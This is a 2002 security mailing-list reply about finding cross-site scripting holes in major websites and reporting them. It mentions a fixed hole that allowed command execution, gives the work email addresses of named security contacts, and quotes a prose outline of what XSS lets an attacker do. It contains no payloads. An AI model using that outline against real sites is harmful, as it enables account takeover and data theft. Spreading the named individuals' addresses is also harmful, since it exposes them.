mailing list archives
Re: Cross-site scripting.
From: zeno <bugtraq () cgisecurity net>
Date: Tue, 26 Mar 2002 08:34:21 -0500 (EST)
I have recently done a "CSS marathon" and found _allmost_ every page I tried
vulnerable within an half an hour. These include microsoft, altavista,
google, cnet, time, ebay, amazon, netscape, yahoo and redhat. This list
probably could have gone on forever if I had taken the time. I have
contacted every one of them about this (except for yahoo and ebay because I
was unable to find a contact emailaddress or feedback form; if it takes
longer to find the contact info than to find the CSS, f#ck 'em) I am now
awaiting their respondses.
Ebay can be reached at clalonde () ebay com I had spoken with him in regards to a old
css hole and he was very prompt in response once I actually found it. Dunno about yahoo
on the otherhand.
Time.com's security contact can be reached at Renee_Guttmann () timeinc com I had found a hole
that not only allowed CSS but also SSI tag insertion into the wevsite search engine.
Of course its fixed now but it took over a month to get fixed. And yes command execution
was possible. Try emailing lists like incidents and say "security contact for "website.com"?
and you will usually get a quick response which was the case with time and me.
Feedback on the usefullness (or futility) of a "general CSS advisory" would
Well as it is generally known CSS holes can allow potential cookie theft. I guess on larger
sites this may be more of an issue because people invest into them. Small sites you probably
sould just email the admins (if you can find them) and if not contact there isp "hey I wanted to
possibly speak with the admin of this site can you help me by giving me an email addy?". Originally
when I contacted ebay it took over 3 months to get a response. Once I did the problem was fixed within
a day. Depending on the sites general security it could perhaps open up some other issues.
- zeno () cgisecurity com
PS: to the people's who email addies I gave out if your upset I did please let me know, after all
giving them out is for your benifit.
By opening a specially crafted URL in the targetted user's web browser (for
instance when he visits your website or reads an email you sent him).
- read anything that user can read from the CSS-vulnerable site.
(addressbook, personal info, etc...)
- do whatever that user can do on the CSS-vulnerable site (send messages,
order stuff, change personal settings and passwords)
- spoof the contents of the CSS-vulnerable site (make somebody think he is
looking at www.foo.com while the contents of the page actually comes from
your site www.bar.com)
- Cross-site scripting. Berend-Jan Wever (Mar 26)
- <Possible follow-ups>
- Re: Cross-site scripting. zeno (Mar 26)